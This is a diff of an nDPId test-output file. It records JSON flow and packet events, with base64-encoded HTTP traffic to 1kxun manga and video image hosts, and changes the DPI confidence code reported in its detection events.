01957{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2059,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1654385156997,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1179,"pkt_l4_len":1145,"thread_ts_msec":1654385156997,"pkt":"tKXvZygQnLbQ0+MzCABFAASNFH5AAEAGsDTAqAJ+oXUNHcP2AFChqIPWvwX7zYAYAfZ2OAAAAQEICrrGVa6XEVcPR0VUIC9pbWFnZXMvcmVhZHBhZ2VfcmV2aXNpb24vcmlnaHQucG5nIEhUVFAvMS4xDQpIb3N0OiBtYW5nYXdlYi4xa3h1bi5tb2JpDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQ6IGltYWdlL3dlYnAsaW1hZ2UvYXBuZyxpbWFnZS8qLCovKjtxPTAuOA0KWC1SZXF1ZXN0ZWQtV2l0aDogY29tLnNjZW5ld2F5Lmthbmthbg0KUmVmZXJlcjogaHR0cDovL21hbmdhd2ViLjFreHVuLm1vYmkvDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvb2tpZTogX19xY193SWQ9NDcyOyBwZ3ZfcHZpZD0xNTc5MTk5MjgwOyBhY2Nlc3NfdG9rZW49bnVsbDsgX19nYWRzPUlEPWZjMGYyMmY3OGQ4MmZiNDQtMjJjNDllMTdhOGNkMDBjMTpUPTE2NTQzODUxNDM6UlQ9MTY1NDM4NTE0MzpTPUFMTklfTVlxQy1PUjQwVGFRTFBJdTd2aGtaLS1VMXRtLVE7IF9nYT1HQTEuMi42OTQ1MjQ1MjguMTY1NDM4NTE0MjsgX2dpZD1HQTEuMi4yMDQ5ODYxNjI3Lj
E2NTQzODUxNDM7IF9nYXQ9MTsgX2dhdF9ndGFnX1VBXzE1NDc1NzkyOV81Nz0xOyBfdHRfZW5hYmxlX2Nvb2tpZT0xOyBfdHRwPWU4NDYzOWI3LTk0MDAtNDA2Yy05N2UxLTAzZjhkYTQ4MTVmODsgaXNfc2F2ZV9jb29raWU9dXNJTXZIa3hQNEpEWGhjOyBfY3JlYXRlX2RhdGU9MjAyMi82LzQ7IG5vbl9uYXRpdmVfZG9tYWluPWh0dHBzOi8vYWtlbWFuZ2Eub3ItZnJuZC5jb207IF92ZXJzaW9uPXYyMDIwMDUwNTsgX2dlbmVyYWxfc3Vic2NyaWJlPTI7IGNsb3Vkb3dsc191dWlkPTM1YmYzNmRmLTBiYWUtZTA5Mi1mMmIxLWI3MzlmNTZjM2VjZDsgY2xvdWRvd2xzX2lzX3N1YnNjcmliZT0xOyBzdWJzY3JpYmVfZ2VuZXJhbF90b2tlbj0zNWJmMzZkZi0wYmFlLWUwOTItZjJiMS1iNzM5ZjU2YzNlY2Q7IGxhc3RfdXJsPW51bGwNCg0K"} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2059,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156997,"flow_last_seen":1654385156997,"flow_idle_time":7580000,"flow_min_l4_payload_len":1113,"flow_max_l4_payload_len":1113,"flow_tot_l4_payload_len":1113,"flow_avg_l4_payload_len":1113,"midstream":1,"thread_ts_msec":1654385156997,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50166,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/right.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
+00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2059,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156997,"flow_last_seen":1654385156997,"flow_idle_time":7580000,"flow_min_l4_payload_len":1113,"flow_max_l4_payload_len":1113,"flow_tot_l4_payload_len":1113,"flow_avg_l4_payload_len":1113,"midstream":1,"thread_ts_msec":1654385156997,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50166,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/right.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2060,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385157001,"flow_last_seen":1654385157001,"flow_idle_time":7580000,"flow_min_l4_payload_len":1119,"flow_max_l4_payload_len":1119,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":1119,"midstream":1,"thread_ts_msec":1654385157001,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01965{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2060,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1654385157001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1185,"pkt_l4_len":1151,"thread_ts_msec":1654385157001,"pkt":"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"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2060,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385157001,"flow_last_seen":1654385157001,"flow_idle_time":7580000,"flow_min_l4_payload_len":1119,"flow_max_l4_payload_len":1119,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":1119,"midstream":1,"thread_ts_msec":1654385157001,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50176,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/list_default.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2060,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385157001,"flow_last_seen":1654385157001,"flow_idle_time":7580000,"flow_min_l4_payload_len":1119,"flow_max_l4_payload_len":1119,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":1119,"midstream":1,"thread_ts_msec":1654385157001,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50176,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/list_default.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 01491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2061,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":2,"flow_last_seen":1654385157145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":748,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":748,"pkt_l4_len":714,"thread_ts_msec":1654385157145,"pkt":"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\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/CDfnXgAAABp0Uk5TAOEQHt3X0s4WI+fFBvPkMNPJq0tAC7VRUC7\/IHCDAAAAsklEQVRYw+3W6wqDMAwF4Fi13nX3y3n\/Bx1dmT\/mYBZSsHK+BziEkiYRIiIiIiLaC3M6Sxx9B1wkBlMBGO6iz3Rwil60XSs441O01T65aESbOcJpIySXvuZctOUHOKV+cm3hZBGSCziVEW2Nf2cboeYSb63N\/rASZhqxmoS5YbVhO1WHvPWGOuS7r1P5jYsZksjkW87rNLbMvBvbSbw0NvrnDnnILInryd98REREREQ\/vAAzzxwTVWsbZwAAAABJRU5ErkJggg=="} 
01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2063,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":2,"flow_last_seen":1654385157153,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":832,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":832,"pkt_l4_len":798,"thread_ts_msec":1654385157153,"pkt":"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\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/L9MC0QAAACR0Uk5TAJSpvW0XB\/bWdRD8t6aZi3E3AvPs3s20r6B8d2dTI0U7LisEPmah4wAAAN5JREFUWMPt1MkOglAMheGi3AsOgDhP4NT3f0YhYiQGMcg9iYvzr7rpt2lSYYwxxhhj7C172I4F0nykCrFLuSiei\/sOWhYa9\/JIKxol69S5PNMqDyYHR8eyr89WKUrWtQXIiCv6kxqduJSPdXl5diinC60VDAevon2\/h5JoS+u8szd85BdjrG3tOtO1Ra+VDn6lva+0ksbT+DNucHQGo0MDo\/0bil7kgqITi6InqaDo6RhGZ4KiVwZGzwRFL68w2rN96f0n+iR9aRM2y5HtRUflfNk0ybERxhhjjLG\/7A7dOIR9fLd0dQAAAABJRU5ErkJggg=="} 
01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2064,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1654385157162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":574,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":574,"pkt_l4_len":540,"thread_ts_msec":1654385157162,"pkt":"nLbQ0+MztKXvZygQCABFAAIwUYBAADQGgY+hdQ0dwKgCfgBQw\/TiBgbELqLpRYAYAPSjggAAAQEICpcRV8K6xlWcSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo1NyBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nDQpDb250ZW50LUxlbmd0aDogMTkzDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBGcmksIDE2IE9jdCAyMDIwIDA3OjExOjEwIEdNVA0KRVRhZzogIjVmODk0NzhlLWMxIg0KRXhwaXJlczogRnJpLCAwMiBTZXAgMjAyMiAyMzoyNTo1NyBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9Nzc3NjAwMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KiVBORw0KGgoAAAANSUhEUgAAAFoAAABaBAMAAADKhlwxAAAAD1BMVEUAAAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+PQt5oAAAABHRSTlMA8a0mzjE4JAAAAF1JREFUWMPt0LsNgDAMRVEgC\/DJACAYANgg6O0\/E0qKpLIipYt0T2PryYXtAQAA9OpdzlTdsd45sDivkKYeaSuBYZK0x+aSvhIYRklzbLwUctA+Xd+k\/cr6BwEAwA+l3hHvzEdfEgAAAABJRU5ErkJggg=="} 
@@ -880,13 +879,13 @@ 01158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1654385157186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":576,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":576,"pkt_l4_len":542,"thread_ts_msec":1654385157186,"pkt":"nLbQ0+MztKXvZygQCABFAAIylDBAADQGPt2hdQ0dwKgCfgBQxACLRcmFq4LjQoAYAPR6KwAAAQEICpcRV9e6xlWzbvw7aAawPVMELTo4l9oXUyfSQao9EpmlQWB5vUp\/AXEBPEbzzwdVge4S8GIhZQN4TwfTVYAOj1wA6cyB\/AAvtbeVgFhLWUwTS0XQFsGFyy7qYBt1tlGbWvABmbwipFtrVgTTGLMi2BgcyK9aM3XCtrmtBLhbJq97te4FdDBoKQdLL9f8ZB7spC4TvHsCCYuiaXLrGdS2iGYQ\/AcQlYFjM0VQqTHtATSJp5plTD+E7ze50uTcvixxhpfLtBrQPqoIEssCqj1KvSRWiJIwxiiEda6DYUahSQeDG8tASlFJiN+bNVCUiEV9uICY4EQ4h5I5DJ7jZRnYnGsqizDD7IlprHB925X7rpbEziY4Vo4oXbQ\/DaBJVtrR5p+TjREy1mMEfU\/uoVFxxuxPPj7eEsc9e5lVBY\/jEOySd5jZXgVkAMVDMWxbK3px1AD2nXrkNoKi8tGu9cyTVDDo97SGkRDWBswOa6+nFvoFCUAkCuGFIhI8bgOIgkFdMqigaT9hhN6njYcbGgjten1FYM6DqC4gRN0h1xVsDT+gpLt+IEwgw5Mu1hFsYpjkuuoITmKMbfLXDzQ\/wJtvtKD6gbDTPQjVE0Swtf\/N7744yEEOcpCDHOQgBznIQQ5ykIMc5CAHOchBDnKQgxzkYBH8DdDO1wSycMqNAAAAAElFTkSuQmCC"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2083,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38326,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1654385176794,"pkt":"tKXvZygQnLbQ0+MzCABFAAED5\/JAAEAGaSDAqAJ+rGl5UpW2AFDAhIjRiFQ344AYAfbp1wAAAQEICvK1uV7Jom0fR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3ZpZGVvcy80MDczMC00OGZkNjU3YWJkNWExZDNlNDVkMDM0MDNkZGNiMDY2My5qcGcgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpIb3N0OiBwaWMuMWt4dW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG9raHR0cC8zLjEwLjANCg0K"} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2083,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38326,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40730-48fd657abd5a1d3e45d03403ddcb0663.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2083,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38326,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40730-48fd657abd5a1d3e45d03403ddcb0663.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2084,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2084,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1654385176794,"pkt":"tKXvZygQnLbQ0+MzCABFAAEDhyVAAEAGye3AqAJ+rGl5UpWqAFDm5trb+jit4YAYAfbp1wAAAQEICvK1uV7Jom0dR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3ZpZGVvcy80MDc1MC01ODU2NDUzNTNhN2E0NzYxNTc1NWI3NzE0YzYxMTgzNS5qcGcgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpIb3N0OiBwaWMuMWt4dW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG9raHR0cC8zLjEwLjANCg0K"} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40750-585645353a7a47615755b7714c611835.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40750-585645353a7a47615755b7714c611835.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2085,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176795,"flow_last_seen":1654385176795,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176795,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2085,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1654385176795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1654385176795,"pkt":"tKXvZygQnLbQ0+MzCABFAAEDkpJAAEAGvoDAqAJ+rGl5UpWsAFD4\/KHAFVJVKoAYAfbp1wAAAQEICvK1uWDJom0fR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3ZpZGVvcy80MDcwMS04ZmE3ZDkxNmM1NWUzMWY5MGZhNTVmNDUwYjcxNjUwNS5qcGcgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpIb3N0OiBwaWMuMWt4dW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG9raHR0cC8zLjEwLjANCg0K"} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2085,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176795,"flow_last_seen":1654385176795,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176795,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38316,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40701-8fa7d916c55e31f90fa55f450b716505.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2085,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176795,"flow_last_seen":1654385176795,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176795,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38316,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40701-8fa7d916c55e31f90fa55f450b716505.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":2,"flow_last_seen":1654385177118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1654385177118,"pkt":"nLbQ0+MztKXvZygQCABFAAF1WjBAADYGAHGsaXlSwKgCfgBQlbaIVDfjwISJoIAYAOs4SwAAAQEICsmibd\/ytbleSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoxNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDg3MzAzDQpMYXN0LU1vZGlmaWVkOiBTdW4sIDI5IE1heSAyMDIyIDAzOjI3OjU1IEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KRVRhZzogIjYyOTJlODNiLTE1NTA3Ig0KRXhwaXJlczogRnJpLCAwMiBTZXAgMjAyMiAyMzoyNjoxNiBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9Nzc3NjAwMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0K"} 
02475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2094,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":3,"flow_last_seen":1654385177118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385177118,"pkt":"nLbQ0+MztKXvZygQCABFAAXUWjFAADYG\/BCsaXlSwKgCfgBQlbaIVDkkwISJoIAQAOsFsgAAAQEICsmibd\/ytble\/9j\/4QAwRXhpZgAATU0AKgAAAAgAAQExAAIAAAAOAAAAGgAAAAB3d3cubWVpdHUuY29tAP\/bAEMAAgEBAQEBAgEBAQICAgICBAMCAgICBQQEAwQGBQYGBgUGBgYHCQgGBwkHBgYICwgJCgoKCgoGCAsMCwoMCQoKCv\/bAEMBAgICAgICBQMDBQoHBgcKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCv\/AABEIAeABkAMBEQACEQEDEQH\/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8\/T19vf4+fr\/xAAfAQADAQEBAQEBAQEBAA